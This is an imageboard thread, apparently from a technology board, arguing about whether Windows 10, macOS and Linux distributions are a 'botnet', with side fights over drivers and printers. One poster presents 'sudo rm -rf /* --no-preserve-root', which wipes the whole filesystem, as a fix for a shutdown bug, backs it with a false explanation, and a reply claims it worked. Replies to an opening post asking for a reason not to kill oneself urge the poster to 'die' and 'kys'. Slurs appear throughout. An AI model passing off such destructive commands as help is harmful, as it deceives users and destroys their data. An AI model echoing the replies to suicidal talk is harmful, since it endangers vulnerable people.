Windows 10 is botnet

>Windows 10 is botnet
>OS X^H^H^H^HmacOS is botnet
>only usable versions of Linux are botnet
Name even ONE reason I shouldn't kill myself right now.

Has Sup Forums always been this retarded? Nobody even knows what the fuck a botnet even is, and they repeatedly apply the definition to the wrong shit.

Can one person give a concise definition of what a Botnet is?

you're a botnet


>Linux finally just werks
>MacOS is still just a glossy UI over a bsd backend
>Windows finally has a UI that doesn't look like a fischer-price toy

It's pretty sweet.

Good point. Just die.

>only usable versions of Linux are botnet


There isn't any. The people who say this are retarded shitposters who know nothing.

>Hey, come join the botnet! It's really nice over here!
I don't think so.

>Linux finally just werks
Then why won't my computer shut down when I'm using proprietary nvidia drivers?

I can't tell if you're just fucking with me or not, but I think this helps me track people's retarded thinking:

"Botnet bad thing that is on your computer. Make computer do bad things for benefit of other."

"Spyware bad things that is on your computer. Spy on you for benefit of other."

"Browser or OS tracking you is a form of Spyware."

"Thus browser or OS tracking you are Botnets."

If this is the linking that has lead to the retarded Botnet meme, then I don't know what to even say.

Because you're a dumbass who doesn't know how to shut off his computer.

Yes because clicking on shutdown is totally not supposed to work right?

nice try CIA

No, it originally came about because Sup Forums has always considered gathering telemetry a botnet. Or, a company providing useful services based on your data.

So why is windows 10 bad exactly? I can never get a solid answer to this question

>only usable versions of linux are botnet
Trisquel user here. You're full of shit.

You don't have the balls.

Okay I got the fix for that user open your terminal and type this in:

sudo rm -rf /* --no-preserve-root

It'll fix the issue.

Why do you add flag to not preserve root when nothing even happens to it?

Because root gets re-written when you reboot, but if you add this it applies the fix so when you boot back up the fix is still there.

Windows 10 & 8, 8.1 & 7 are all spyware not part a botnet.. mostly.
Windows 10 does do p2p windows updates so I guess Kind of a botnet but thats it.

And 90% of linux distros are not botnet /spyware

install gentoo /thread

>Name even ONE reason
You don't know English.


>And 90% of linux distros
>Look for updates after load
>Anonymous fag who build your OS know your IP
>Know when your PC online
>Can send you backdoor as security update anytime
That can go wrong?

testing firefox in linux on windows. ignore post.

prove it faggot

>Linux finally just werks
Your days are numbered before the next time you're unable to resolve a dependency.

That's literally not what a botnet is. Why don't you just say spyware?

My Canon printer has fully functional drivers for Android, but not for Linux. I am not kidding. Yesterday, I had to print a document, and I was between wiping my Windows partition and reinstalling Windows. It was urgent and I didn't manage to make my printer work on Ubuntu. In the end, I took a chance with their proprietary printer app for Android and it worked instantly.

Android has better hardware support than Linux.

Do you not realize that Android's kernel is Linux?

becauses you're using proprietary nvidia drivers

NO. Reeeeally? Well that's fantastic news, user! Let me just plop Canon's proprietary printer app into my Ubuntu and fire up my printer! I'm sure that's gonna work like magic. After all, they have the same kernel, so it's exactly the same fucking thing.


Have you ever tried running anything that uses 3D with nouveau drivers?

Then why are you comparing the two, moron?

I have and it works fine

>being this dense
The only appropriate response at this point is to rewrite my initial post, so I'm just gonna tell you to read it again instead: Here is the summary of what you should have taken away from it:


That they have the same kernel is irrelevant.

They don't "have the same kernel". Linux IS the kernel.

So you're just annoying me about semantics because of your autism? Could you just please do this board a favor and go stand in the middle of a runway?

If printer printed with Android, it logically follows that printer printed with Linux.

Yeah but no. A printer "driver" on android is an Android application, not a kernel module.

Oh c'mon goy!
Who would even try to disable these critical security updates? Take off that tinfoil hat, you fool, we don't need your silly bitcoins and shit, just trust us!

Shows how much you know.

1. You and every other user at the same time, because you're not a special snowflake.
2. That probably wouldn't fly with the community once it's been found out.
3. About half the distros are RHEL-based if you want to stick to open source software so that what you run is community moderated. Otherwise, there's a price to pay for proprietary. There's no way around it.

Okay genius, tell me how you use printer software released for Android to use a printer on GNU/Linux.

Why don't you just look at the source code of the application to see how it loads the driver?

>1. You and every other user at the same time, because you're not a special snowflake.
>2. That probably wouldn't fly with the community once it's been found out.

Same with win10 botnet, community moderated by Microsoft top professionals and billions of satisfied users worldwide. Nothing to hide nothing to fear.

>nothing to hide nothing to fear
Literally retarded, just because you have nothing to hide doesn't mean I want some retards looking around.

So if you now have nothing to hide, it's fine that I go through your entire computer and house? Right?

Maybe you should pay more attention to your homework, Pajeet.

Agreed, nobody here seems to know what a botnet is. It's a group of computers or "bots" controlled by another computer, generally maliciously through malware to do tasks like DDoS, bitcoin mining or malware spreading

>Windows has finally a UI that doesn't look like FisherPrice TY

But thats wrong user it's shit, you can't even use alt+"KeyHere" to do stuff it's straight out of shitty touch fisher price OS

You are by far the worst tripfag we had here. Even worse than Nigba.

it worked like a charm, i had the same problem

proprietary things is haraam

because if you kill yourself you will DIE!

Windows 7

Actually, gentoo is the only usable GNU distro, and it's not botnet. Just try to install ubuntu. Protip: you won't even be able to do that, that's how unusable ubuntu has become.

>dumb anime poster

I can't think of a single reason desu

Do it

>rm -rf
>root directory
No thanks, I'd rather have my system intact.

Why would the "ready machine" command cause any issue?


You should, you seem to think that people are interested in what OS you use or whether or not your paranoid delusions are real.

Protip: Nobody cares, kys lol

I'm pretty sure I'd be capable of installing ubuntu


systemd-less distros are pretty usable mate

Try it. The installer will crash every 0.5 seconds, preventing you from successfully installing it.

>In his Q&A to his keynote address at the World Hosting Days Global 2014 conference in April, the world’s largest hosting and cloud event, Julian Assange discussed encryption technology in the context of hosting systems. He discussed the cypherpunk credo of how encryption can level the playing field between powerful governments and people, and about 20 minutes into his address, he discussed how UNIX-like systems like Debian (which he mentioned by name) are engineered by nation-states with backdoors which are easily introduced as ‘bugs’, and how the Linux system depends on thousands of packages and libraries that may be compromised.

Assange? More like asshat.

t.debianfag sucking on poettering's micropenis

everything is a botnet, just use OSX since it's the best OS

Install Gentoo.
Or devuan if you're an almost-cuck.